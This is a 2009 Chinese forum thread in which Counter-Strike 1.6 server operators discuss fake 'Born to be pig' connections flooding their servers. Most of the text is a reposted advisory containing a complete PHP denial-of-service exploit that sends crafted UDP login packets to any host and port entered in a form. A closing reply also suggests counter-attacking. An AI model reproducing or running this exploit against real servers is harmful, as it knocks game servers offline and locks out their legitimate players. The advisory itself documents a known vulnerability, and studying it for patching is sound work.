tlxch 发表于 2009-2-4 18:31:04

遭受攻击,现在怎么办?

本帖最后由 tlxch 于 2009-2-4 18:32 编辑

Born to be pig ( timed out
(1)Born to be pig ( timed out
(5)Born to be pig ( timed out
(7)Born to be pig ( timed out
(2)Born to be pig ( timed out
(6)Born to be pig ( timed out
(3)Born to be pig ( timed out


服务器里很多这个名字,服务器打过补丁,但是这么多这个名字的人进来,本来服务器人数就不是太多,现在好,都是这个,其他人都进不来了~~
无语了!!!

94132580 发表于 2009-2-4 18:45:17

你的补丁应该没有打正确吧

tlxch 发表于 2009-2-4 18:47:59

补丁打过了,要不服务器早挂了,现在问题是服务器没挂,只是很多 Born to be pig 的名字的人连接 这样,吧服务器的位置全部占了,别人进不来~!

8874323 发表于 2009-2-4 19:47:15

我也遇到这样的问题:被炸,装了补丁后好点,比赛F也被炸,不过有密码没炸成,就是里面的人ping都230↑不知道谁无聊玩炸服

axot 发表于 2009-2-4 19:58:40

Born to be pig ( timed out
(1)Born to be pig ( timed out
(5)Born to be pig ( timed out
(7)Born to be pig ( timed out
(2)Born to be pig ( timed out
(6)Born to be pig ( timed out
(3)Born to be pig ( tim ...
tlxch 发表于 2009-2-4 19:31 http://www.dt-club.net/forum/images/common/back.gif
补丁什么版本的

ttbs123 发表于 2009-2-4 20:45:04

晕,axot老大的补丁还能给假人进去占位吗?目前我还没有发现有这个问题,不知道是不是别人没有攻击我还是什么。

szxms 发表于 2009-2-4 20:49:42

Half-Life Counter-Strike登录拒绝服务漏洞
也就是我们通常说的炸F
漏洞消息时间:2008-01-07

漏洞起因
异常条件处理失败错误

影响系统
Valve Software Half-Life Counter-Strike 1.6

不受影响系统

危害
远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

攻击所需条件
攻击者必须访问Half-Life Counter-Strike。

漏洞信息
Half-Life Counter-Strike是一款流行的即时射击游戏。
Half-Life Counter-Strike不正确处理登录请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
提交恶意登录请求可触发此漏洞。

测试方法
----

Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/__ __ _______________________ ______________________    \\    / .\//_// //            /      \       \/      __       \   /__/   /
/ /   /_//            /\      /       /      /         /   /___/
\/      /            / /       /       /\   /         /         /
/      /               \/       /       / /    /         /__       // \       /    ____________/       /      \/    __________// /__    // /   
/\\      \_______/      \________________/____/2007    /_//_/   // // \ \\                                                               // // /
.\ \\      -[   ITDEFENCE.ru Security advisory   ]-         // // / .
. \_\\_________________//_//_/ . ./*

CS-dos exploit made by underwater

Bug was discovered by .FUF

Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server http://www.softoplanet.ru/style_emoticons/default/biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su

*/



ini_set("display_errors","0");



function HELLO_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "TSource Engine Query";

$packet .= pack("H*","00");

return $packet;

}



function CHALLENGE_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "getchallenge valve";

$packet .= pack("H*","00");

return $packet;

}



function LOGIN_PACKET_4()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';

$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';

$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","220A0000EE02");

return $packet;

}



function LOGIN_PACKET_2()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';

$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';

$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","22");

return $packet;

}



function dowork($host,$port,$password,$auth)

{

global $password;

global $cookie;

# connecting to target host

$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);

if (!$fsock) die ($errstr);

else

{

# sending hello packet

fwrite ($fsock,HELLO_PACKET());

fread ($fsock,100);

# sending chalennge packet

fwrite ($fsock,CHALLENGE_PACKET());

# recieving cookies

$resp = fread($fsock,100);

# grab cookies from packet

$cookie = substr($resp,strpos($resp,"A00000000")+10);

$cookie = substr($cookie,0,strpos($cookie," "));

# sending login packet

if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());

$resp = fread($fsock,100);

}

}



IF (isset($_POST['host']) && isset($_POST['port']))

{

IF (empty($_POST['pass'])) $password = "123";

else $password = $_POST['pass'];

$fserver = $_POST['host'];

$fport = $_POST['port'];

if (isset($_POST['auth'])) $fauth = true;else $fauth=false;

# we have to connect 2 times

$result = dowork($fserver,$fport,$password,$fauth);

$result = dowork($fserver,$fport,$password,$fauth);

# parsing result

echo "Exploit Sent";

}
复制代码----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

厂商解决方案
目前没有解决方案提供:
http://www.valvesoftware.com/games.html

漏洞提供者
Maxim Suhanov

漏洞消息链接
http://www.securityfocus.com/bid/27159

漏洞消息标题
Half-Life Counter-Strike Login Denial of Service Vulnerability

ypf 发表于 2009-2-5 01:54:56

我也遇到这样的问题:被炸,装了补丁后好点,比赛F也被炸,不过有密码没炸成,就是里面的人ping都230↑不知道谁无聊玩炸服
8874323 发表于 2009-2-4 19:47 http://www.dt-club.net/forum/images/common/back.gif

遇到这个情况,可以查看,hlds的窗口或日志可以看到攻击你的名字后面的相对应的ip,封了他就不完了

野*人 发表于 2009-2-5 03:45:46

本帖最后由 野*人 于 2009-2-5 05:01 编辑

人是人他妈生的,所以有人性。
妖是妖他妈生的,所以没人性。
而没人性的,我们可以简称为--->>畜生!

随便说的,捞分,走人....

那个那个谁 发表于 2009-2-5 10:49:59

查询攻击来源,然后....反攻~!;P
页: [1] 2
查看完整版本: 遭受攻击,现在怎么办?